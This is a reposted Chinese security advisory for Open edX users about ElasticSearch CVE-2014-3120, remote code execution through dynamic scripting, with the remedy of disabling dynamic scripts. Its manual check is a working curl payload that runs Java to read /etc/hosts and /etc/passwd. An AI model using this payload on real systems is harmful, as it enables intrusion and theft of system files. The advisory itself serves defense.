转载自:[记录] Open edX 用户注意防范ElasticSearch远程任意代码执行漏洞
请各位edx用户 注意CVE: CVE-2014-3120
edx官方虽然意识到了这个漏洞 (configuration),并且尝试修复了 但是只在集群安装时(configuration)才会用到他们的防御代码,所以如果各位使用官方wiki 安装的将依然会是含有漏洞的版本
原理
这个漏洞实际上非常简单,ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。
ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。
而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。
检测方法
在线检测:
http://tool.scanv.com/es.html 可以检测任意地址
http://bouk.co/blog/elasticsearch-rce/poc.html 只检测localhost,不过会输出/etc/hosts和/etc/passwd文件的内容到网页上
自己手动检测:
<td class="content">
<code class="plain">curl -XPOST '<a href="http://localhost:9200/_search?pretty">http://localhost:9200/_search?pretty</a>' -d '</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>2</code>
</td>
<td class="content">
<code class="plain">{</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>3</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"size": 1,</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>4</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"query": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>5</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"filtered": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>6</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"query": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>7</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"match_all": {}</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>8</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">}</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>9</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">}</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>10</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">},</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>11</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"script_fields": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>12</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"/etc/hosts": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>13</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>14</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">},</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>15</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"/etc/passwd": {</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>16</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">"script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>17</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">}</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>18</code>
</td>
<td class="content">
<code class="spaces"> </code><code class="plain">}</code>
</td>
</tr>
</table>
</div>
<div class="line alt1">
<table>
<tr>
<td class="number">
<code>19</code>
</td>
<td class="content">
<code class="plain">}</code>
</td>
</tr>
</table>
</div>
<div class="line alt2">
<table>
<tr>
<td class="number">
<code>20</code>
</td>
<td class="content">
<code class="plain">'</code>
</td>
</tr>
</table>
</div>
处理办法
关掉执行脚本功能,在配置文件elasticsearch.yml里为每一个结点都加上:
<td class="content">
<code class="plain">script.disable_dynamic: true</code>
</td>
</tr>
</table>
</div>
参见:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html#_disabling_dynamic_scripts
官方会在1.2版本默认关闭动态脚本
参见:
https://github.com/elasticsearch/elasticsearch/issues/5853
参考:
http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html